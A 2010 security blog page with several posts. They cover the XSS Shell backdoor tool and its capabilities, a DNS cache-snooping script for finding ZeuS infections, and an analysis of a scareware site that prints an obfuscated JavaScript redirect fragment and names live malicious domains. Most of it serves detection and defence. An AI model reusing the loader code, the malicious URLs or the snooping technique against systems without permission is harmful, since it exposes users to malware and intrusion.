XSS Shell Demo

Posted May 4th, 2010. Filed under DotCom

I was just going through my RSS reader and came across something interesting posted on SecurityTube.Net:

XSS Shell is a powerful XSS backdoor and zombie manager. The concept was first presented by XSS-Proxy. Normally in an XSS attack the attacker has one shot; with XSS Shell you can interactively send requests to the victim's browser and get the responses back, and you can backdoor the page.

You can steal basic authentication credentials, bypass IP restrictions on administration panels, DDoS systems through a persistent (stored) XSS vulnerability, etc. The attack possibilities are limited only by ideas. Basically this tool demonstrates that you can do more with XSS.

XSS Shell has several features for gaining full control over the victim, and you can easily add your own commands. Most features can be enabled or disabled in the configuration or tweaked in the source code. The main feature of XSS Shell is 'Page Regeneration': XSS Shell re-renders the infected page and keeps the user inside a virtual environment, so even if the user clicks links on the infected page he or she is still under control (within the browser's cross-domain, i.e. same-origin, restrictions). In a normal XSS attack, once the user leaves the page you can't do anything. Secondly, this feature keeps the session alive, so even if the victim follows an outside link from the infected page the session will not time out and you remain in charge.

In this video, killer3027 shows us a demo of XSS Shell. Thanks go out to zitstif for referring this video to us!

Video : http://securitytube.net/XSS-Shell-Demo-video.aspx

OK, the interesting part is this: killer-tr is a friend of mine from warezforum.info.
Guess who Kabron is in that video.

Book of the Month: NMAP COOKBOOK

Posted April 19th, 2010. Filed under DotCom

"NMAP COOKBOOK – The fat-free guide to network scanning" is the latest book on the world's best network scanning tool, Nmap. It is the most popular tool of its kind, with a plethora of options, and runs on a wide range of platforms including Windows and Linux.

Nmap is the most popular tool out there, with so many options for fine-tuning a network scan to one's needs that newcomers and even experienced professionals often find it difficult to use its full feature set in field work. In this respect, 'NMAP Cookbook' does a great job of conveying the rich features of this great tool through simplified and concise illustrations.


In a nutshell, the following topics are covered:

* Installation on Windows, Mac OS X, Unix/Linux platforms
* Basic and advanced scanning techniques
* Network inventory and security auditing
* Firewall evasion techniques
* Zenmap – A graphical front-end for Nmap
* NSE – The Nmap Scripting Engine
* Ndiff – A Nmap scan comparison utility

In addition to explaining basic scanning techniques, it goes on to describe related topics such as firewall evasion methods, the Nmap Scripting Engine and the graphical front-end. Together these make it a great reference book for any security professional.

The book is written against the latest version of the tool, Nmap 5.0. All the scanning options are shown along with visual illustrations, which helps in quickly grasping the practical examples.

Overall, it stands out from other Nmap books thanks to its simple and concise explanations, which make it fast and easy to master the intricacies of Nmap.

Source :http://nagareshwar.securityxploded.com/2010/04/19/book-of-the-month-nmap-cookbook/

P.S. If anyone has found a .pdf, I'd like a link too.

Finding Malware on your network via cached DNS entries

Posted April 19th, 2010. Filed under DotCom

UPDATE: There's a new version, with 25% fewer bugs! Use this instead.

As some of you may know, I wear an Incident Response hat within my organization. As I like to be proactive and actively search for issues rather than just be an IDS alert monkey, I love pages like the Malware Domain List, the ZeuS Tracker, and malwareurl.com. While these are great resources, it is a bit difficult to take the lists and apply them to the environment; most of their usefulness comes when you have a questionable URL and need to see if someone else has reported it as a bad site. A great service, but not proactive.

While staring at the ZeuS Tracker Domain Block list and trying my usual method of snipe hunting, manually entering domains to query the firewalls, a moment of inspiration hit: I don't care about all the domains, just the domains that people visit. Who knows what domains people visit? The DNS servers! Now it was just a question of trying to coax the information out of the DNS servers. Thankfully, PaulDotCom Security Weekly came to the rescue: they have been talking about getting information out of DNS servers during penetration tests, and a simple non-recursive DNS lookup on the local DNS server can tell you if someone queried for the host recently. A couple of quick experiments on my work's main DNS servers confirmed this, and I set to work.

My first attempt was a simple script to take a pre-chewed version of the ZeuS Domain list, feed it through dig and pipe the output through grep. It worked, but I wanted something a touch more automated. Over the next couple of nights on the train, I whipped up a tool to automate the process a little more. The resulting tool is the ZeuS DNS Scraper. It's a simple script written in Perl and should work straight out of the box with the default modules included in a Perl distribution.

Running the Script

Running the tool is fairly simple; there are only 4 options: --server, specifying which server(s) to query; --file, specifying where to put the downloaded ZeuS Tracker block list (defaulting to /tmp/ztbl.txt); --download/--nodownload, which specifies whether or not the script should attempt to download the block list; and --debug, which controls the verbosity of the script.

A typical command line would be:

perl zeusdnsscraper.pl --server 192.168.1.2 --server 192.168.1.3

This downloads the block list and then queries 192.168.1.2 and 192.168.1.3 for each entry in it. You can specify as many servers as you like; however, the block list often hovers around a thousand entries, so each additional server adds another thousand or so queries.

Once the list has been downloaded, the script will only download it again if the local copy is older than 60 minutes (don't worry, it doesn't update that frequently). You can also tell the script not to download the list at all with the --nodownload option:

perl zeusdnsscraper.pl --server 192.168.1.2 --server 192.168.1.3 --nodownload

You can also turn on debugging with the --debug option, which will display every step in the process:

perl zeusdnsscraper.pl --server 192.168.1.2 --server 192.168.1.3 --debug

Interpreting Results

When the script is run in default mode, a '.' will appear after each query, while in debug mode it will display the result of each query and whether or not it found an entry.

What You Want To See

Completed!
NNNN queries made, 0 entries found! Hooray!

In this example, NNNN is the number of queries sent (remember, this increases with each additional server you query), and 0 entries were found, indicating that the queried DNS servers have no cached entries for any of the domains. Congratulations, pat yourself on the back and grab yourself a nice frosty beverage from the refrigerator.

What You Do Not Want To See

NNNN queries made, 4 entries found. Uh Oh.
W.X.Y.Z has an entry in its cache for www.example.net: 10.1.2.3
W.X.Y.Z has an entry in its cache for www.example.net: 10.1.2.4
W.X.Y.Z has an entry in its cache for www.example.com: 10.4.5.6
W.X.Y.Z has an entry in its cache for www.example.org: 10.7.8.9

Well, crap. This time the beverage you need is probably kept in your attrition.org flask. NNNN is the number of queries the script made and the "4" in this example is the number of results found. Here, "www.example.net" was cached with two separate addresses, while "www.example.com" and "www.example.org" each have one. W.X.Y.Z is the DNS server that responded, and the 10.X.X.X addresses are the IP addresses it returned. These IP addresses are what you are interested in.

My DNS Servers Have Cached Entries! Now What?

This is where some good old detective work comes in. The presence of a cached entry on your DNS server only means that one of the clients on your network asked for the name in question. Normally, it's time to start plugging the returned IP addresses into your firewall logs to see who has been talking to them. Then it's time to start cleaning.

Caveats

Now, obviously, this sends a boatload of queries in a very rapid fashion to the DNS servers. Make sure that your DNS server and your connection can handle the load, and don't run it against DNS servers that you do not have permission to query. Also, some of the DNS entries have small enough TTLs that they may expire quickly, meaning that even if the script comes back clean, there could still be infected hosts. Two further points worth keeping in mind: because the queries are non-recursive they do not populate the cache themselves, so repeated runs will not create false positives; and the check only sees the resolvers you ask, so a client configured to use an outside DNS server will never show up here.
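The check the whole post rests on is a single DNS query with the "recursion desired" bit cleared: a caching resolver then answers only from what it already holds, so an answer means somebody on the network looked the name up recently. The following is an added Python example, not the ZeuS DNS Scraper itself, that builds such a query, parses the reply and reports the cached A records in the same shape as the output above. The server address in the usage comment and the reply produced by build_response are assumptions (the reply is constructed so the parser can be exercised offline); on a real network you would call snoop() once per block-list entry against each resolver you are allowed to query.

```python
import random
import socket
import struct

# Added example (not the ZeuS DNS Scraper itself): a minimal non-recursive "cache snoop"
# for one name against one resolver, plus a parser for the reply.

def encode_name(name):
    """Wire-format a hostname as length-prefixed labels ending in a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"

def build_query(name, txid, recursion_desired=False):
    """Build an A query. With RD (0x0100) clear, a caching resolver answers only from
    what it already holds and does not go out and resolve the name on our behalf."""
    flags = 0x0100 if recursion_desired else 0x0000
    header = struct.pack(">HHHHHH", txid, flags, 1, 0, 0, 0)  # QDCOUNT=1
    return header + encode_name(name) + struct.pack(">HH", 1, 1)  # QTYPE=A, QCLASS=IN

def _read_name(buf, offset):
    """Decode a possibly compressed name; return (name, offset just past it)."""
    labels, end, jumped = [], offset, False
    while True:
        length = buf[offset]
        if length & 0xC0 == 0xC0:  # compression pointer (RFC 1035 section 4.1.4)
            if not jumped:
                end = offset + 2
            jumped = True
            offset = struct.unpack(">H", buf[offset:offset + 2])[0] & 0x3FFF
            continue
        if length == 0:
            offset += 1
            break
        labels.append(buf[offset + 1:offset + 1 + length].decode("ascii"))
        offset += 1 + length
    if not jumped:
        end = offset
    return ".".join(labels), end

def parse_response(buf, txid):
    """Return (rcode, [(name, ttl, ipv4)]) for the A records in the answer section.
    An empty list with RCODE 0 is the 'not cached' case: the resolver typically hands
    back a referral in the authority section instead of an answer."""
    rid, flags, qd, an, _ns, _ar = struct.unpack(">HHHHHH", buf[:12])
    if rid != txid:
        raise ValueError("transaction id mismatch")
    offset = 12
    for _ in range(qd):
        _, offset = _read_name(buf, offset)
        offset += 4  # skip QTYPE/QCLASS
    answers = []
    for _ in range(an):
        name, offset = _read_name(buf, offset)
        rtype, _rclass, ttl, rdlen = struct.unpack(">HHIH", buf[offset:offset + 10])
        offset += 10
        rdata = buf[offset:offset + rdlen]
        offset += rdlen
        if rtype == 1 and rdlen == 4:
            answers.append((name, ttl, socket.inet_ntoa(rdata)))
    return flags & 0x000F, answers

def snoop(server, name, timeout=2.0):
    """Ask `server` (a resolver IP you are allowed to query) whether `name` is cached."""
    txid = random.randrange(65536)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_query(name, txid), (server, 53))
        data, _ = s.recvfrom(4096)
    return parse_response(data, txid)

def build_response(txid, name, ips, ttl=300):
    """CONSTRUCTED reply, used only so the parser can be exercised offline."""
    flags = 0x8080  # QR=1, RA=1, RD=0 (the server echoes our cleared RD bit), RCODE=0
    header = struct.pack(">HHHHHH", txid, flags, 1, len(ips), 0, 0)
    question = encode_name(name) + struct.pack(">HH", 1, 1)
    answers = b""
    for ip in ips:
        # 0xC00C: compression pointer back to the name in the question at offset 12
        answers += struct.pack(">HHHIH", 0xC00C, 1, 1, ttl, 4) + socket.inet_aton(ip)
    return header + question + answers

if __name__ == "__main__":
    # Same shape as the post's "Uh Oh" output, against a constructed reply.
    rcode, hits = parse_response(build_response(0x1234, "www.example.net", ["10.1.2.3", "10.1.2.4"]), 0x1234)
    for name, ttl, ip in hits:
        print("resolver has an entry in its cache for %s: %s (ttl %d)" % (name, ip, ttl))
    # Live use (needs network access and permission), assumed resolver address:
    # print(snoop("192.168.1.2", "www.example.net"))
```

The TTL is returned on purpose: it is the remaining lifetime of the cached record, so a small value tells you the lookup happened a while ago and that a second run a few minutes later may come back clean even though the host is still infected, which is the caveat above.
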

Thanks

I’d just like to say a big thanks to the folks over at abuse.ch for hosting the ZeuS Tracker. It’s a handy tool and it’s invaluable if you’re running even a moderately sized network.

Source and more info here : http://www.innismir.net/article/467

The Virus Underground (24c3)

Posted April 9th, 2010. Filed under DotCom

This is the video of the presentation titled “The Virus Underground” given by SkyOut at 24c3.

Listeners will be introduced to the world of virus coding. They will understand how it can be seen as a way of expressing yourself and why it is a form of hacking. Furthermore, they will get to know which important groups, authors and viruses there have been in recent years and which are still active today. Important technical terms will be explained, as well as trends of recent years and of the future. And more.

Source : Securitytube.net

CleanUp Antivirus(Lolz) and Discovery.com

Posted April 5th, 2010. Filed under DotCom

OK, I was browsing the internet aimlessly, click, click and click again without really knowing why, until I ended up here: http://potolami.freei.me/ (don't visit it if you run Windows and don't have JavaScript turned off).
Page source: Sursa.txt

The source is much longer, but the rest is nothing but nonsense like this:

Discovery.com survivor skills, but the way, like california innovations, could kill an complex &quot if the day argues to eliminate harm territories from rare people, using it harder to erect the video routines.
Petroleum will buy its relationships and mean down its affected threats, discovery.com survivor skills.
Discovery.com survivor skills, i think both your interests for further plenty.

Discovery.com survivor skills, this gene was along seen as many seeds swung purple aztec forces in the  intrusive sport.
For himself, you might reduce a independence by following a coloration over the stage, discovery.com survivor skills.
Discovery.com survivor skills, all categories have scientists and often all will bring in helium.

Discovery.com survivor skills, a interested moisture is the game contributing laptop, perhaps fought in the addiction bake.
Discovery.com survivor skills, this embellished over 700,000 fantasia.
Sometimes, that spoke our heat for feature, discovery.com survivor skills.

Naturally, this piece of JavaScript caught my eye. Source:

qy=11;
joyd=top;
l=””;
u=new Array();
sd=new Date();
u[4]=’k.fu’;
u[7]=’t.ne’;
u[6]=’ta’;
bp=”referrer”;
u[1]=’tp’;
u[3]=’ppq’;
sp=qy-10;
u[0]=’ht’;
gx=”location”;
u[8]=’t/’
u[5]=’lls’;
xjq=joyd.document;
u[2]=’://’;
for (var g=0;g

I'm no great expert, but I'm quite convinced something is not right here! (Those more familiar with JavaScript can comment.)
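What the snippet above is doing with u[] is a common trick: the string it wants is cut into fragments, assigned to array slots in a shuffled order, and joined back together in a loop so that the URL never appears in the source and a plain grep for it finds nothing. The same goes for bp="referrer" and gx="location": the DOM property names are kept as string constants (presumably for later xjq[bp] / joyd[gx] style access) so the source never contains a literal document.referrer or top.location. The script below is an added Python example, not part of the post, that recovers the joined string statically, without ever executing the JavaScript. It uses only the assignments quoted above (the for-loop body is cut off in the post, so nothing is assumed about it); the list of DOM property names it flags is my own choice.

```python
import re

# Added example (not from the post): recover the URL hidden in the array-split
# JavaScript above WITHOUT executing it. Only the assignments quoted in the post
# are used; the for-loop body is cut off there, so nothing is assumed about it.
OBFUSCATED_JS = """
qy=11;
joyd=top;
l="";
u=new Array();
sd=new Date();
u[4]='k.fu';
u[7]='t.ne';
u[6]='ta';
bp="referrer";
u[1]='tp';
u[3]='ppq';
sp=qy-10;
u[0]='ht';
gx="location";
u[8]='t/'
u[5]='lls';
xjq=joyd.document;
u[2]='://';
"""

# name[index] = 'fragment'   (either quote style; the closing quote must match)
ARRAY_ASSIGN = re.compile(r"""(\w+)\[(\d+)\]\s*=\s*(['"])(.*?)\3""")
# name = "word"   bare string constants, often DOM property names used as obj[name]
STRING_ALIAS = re.compile(r"""\b(\w+)\s*=\s*(['"])([A-Za-z_]\w*)\2""")
# Property names worth flagging when they only ever appear as quoted strings
# (my own short list, an assumption of this example).
DOM_PROPERTIES = {"location", "referrer", "cookie", "href", "write", "src", "eval"}

def recover_split_strings(js):
    """Return {array_name: (joined_string, missing_indices)}. Fragments are joined
    in index order, which is what the obfuscator's loop does, regardless of the
    order in which the assignments appear in the source. Gaps are reported so a
    partially captured script does not yield a silently wrong URL."""
    arrays = {}
    for name, idx, _quote, frag in ARRAY_ASSIGN.findall(js):
        arrays.setdefault(name, {})[int(idx)] = frag
    out = {}
    for name, parts in arrays.items():
        missing = sorted(set(range(max(parts) + 1)) - set(parts))
        out[name] = ("".join(parts[i] for i in sorted(parts)), missing)
    return out

def dom_property_strings(js):
    """Return DOM property names that appear as quoted string constants, i.e. the
    script avoids writing top.location / document.referrer literally."""
    found = {val for _name, _quote, val in STRING_ALIAS.findall(js) if val in DOM_PROPERTIES}
    return sorted(found)

if __name__ == "__main__":
    for name, (joined, missing) in recover_split_strings(OBFUSCATED_JS).items():
        gap = " (missing indices %s)" % missing if missing else ""
        print("%s[] joins to: %s%s" % (name, joined, gap))
    print("DOM properties referenced by string:", dom_property_strings(OBFUSCATED_JS))
```

Run on the snippet as quoted, the nine u[] fragments join to http://ppqk.fullstat.net/ and the flagged property strings are location and referrer. That joined host is the thing to look up in a malware URL list, not the page you landed on; what the cut-off loop then does with top.location and document.referrer cannot be determined from the fragment in the post.
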

OK, so where does all this lead? The answer is very simple: after visiting the page you end up here: http://zdustsave19.xorg.pl. A few exact links:

Link 1 : click
Link 2 : click

So now we've reached the page where all the honey is. Here we are warned that we are infected with all kinds of viruses, that our operating system is Windows Vista (lol, that's a good one!) and that we absolutely must download this: http://www.virustotal.com/analisis/5b6d4de537d0113acd2ead6b43b8aa3a3e285f9a06db5fc9cb298ba428616341-1270446095.
I downloaded the file on my Ubuntu box and then installed it on a Windows XP SP2 in VirtualBox.
What I got:
http://i44.tinypic.com/9ssdqu.png ( fig1)
http://i41.tinypic.com/b7i0ef.png (fig2)

In figure 2 you can also see a few IPs; if you're curious and do a little searching you'll come across this: http://www.malwareurl.com/listing.php?domain=94.102.63.64

And so we arrive at a single conclusion: USE NOSCRIPT

Automated seo poisoning attacks

Posted March 31st, 2010. Filed under DotCom

This paper describes recent research by SophosLabs into how attackers are using blackhat Search Engine Optimisation (SEO) techniques to stuff legitimate websites with content designed to rank highly in search engine results, yet redirect users to malicious sites. These websites are being used to distribute rogue security products (also known as "scareware" or "fake antivirus") onto users' computers.
Sophos researchers have analysed the malicious SEO kits used by hackers to create networks of thousands of cross-linked pages containing search-friendly content on hot-trending topics, hosted on compromised, legitimate websites.

Download : PDF

Source : http://security-sh3ll.blogspot.com

Powered by HaxTor | CopyWrong © 2011